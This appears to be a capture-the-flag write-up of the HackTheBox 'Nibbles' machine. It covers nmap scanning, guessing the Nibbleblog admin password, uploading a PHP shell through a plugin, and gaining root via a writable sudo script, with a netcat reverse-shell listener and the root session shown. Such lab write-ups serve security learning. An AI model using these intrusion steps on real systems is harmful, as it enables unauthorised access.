┌──(kali㉿kali)-[~/HackTheBox/Nibble/10.10.10.75/nmap] └─$ nmapenumertor 10.10.10.75 Basic Nmap 7.91 scan initiated Tue Feb 9 03:27:22 2021 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.75.nmap 10.10.10.75 Nmap scan report for 10.10.10.75 Host is up (0.20s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Tue Feb 9 03:27:36 2021 -- 1 IP address (1 host up) scanned in 13.94 seconds
The box has two services one OpenSSH at port 22 and an Apache server at port 80. The Apache version mentioned here is vulnerable to the shellshock vulnerability. On checking the http://10.10.10.75/cgi-bin/ , it’s showing directory not found.
Time to move on.
On checking the page source, I got the info
Let’s checkout the /nibbleblog directory.
Time to get more info on Nibbles. Doing a serach on Nibble Blog landed me into a page which describes how one can upload a shell to Nibble 4.0.3 version.
As per the blog, if I get admin access then I can upload a php shell.
Checking if admin.php exists.
This is where I got stuck for a while, tried to login using some default passwords this got me blacklisted. Tried the page after a couple of minutes, not blacklisted anymore. Brute forcing won’t work here. Need to guess!
Tried admin:nibbles which worked got admin access. Pheeww!
Moving to the plugin directory, and opening the shell and getting the user flag.
We don’t have root access till now, let’s check if the user has any binaries with sudo permission.
1 2 3 4 5 6 7 8 9 10 11 12
sudo -l
nibbler@Nibbles :/home/nibbler# sudo -l
sudo: unable to resolve host Nibbles: Connection timed out Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Nice! The directory personal/stuff is not present. Let’s make one and add the file monitor.sh. We can use this to create a reverse shell and get the root flag.
┌──(kali㉿kali)-[~/bi0s] └─$ sudo nc -nvlp 800 [sudo] password for kali: listening on [any] 800 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.75] 37638 bash: cannot set terminal process group (1328): Inappropriate ioctl for device bash: no job control in this shell root@Nibbles:/home/nibbler/personal/stuff# whoami whoami root root@Nibbles:/home/nibbler/personal/stuff# cd /home/ cd /home/ root@Nibbles:/home# ls ls nibbler root@Nibbles:/home# cd / cd / root@Nibbles:/# cd /root/ cd /root/ root@Nibbles:~# ls ls root.txt root@Nibbles:~# cat root.txt cat root.txt
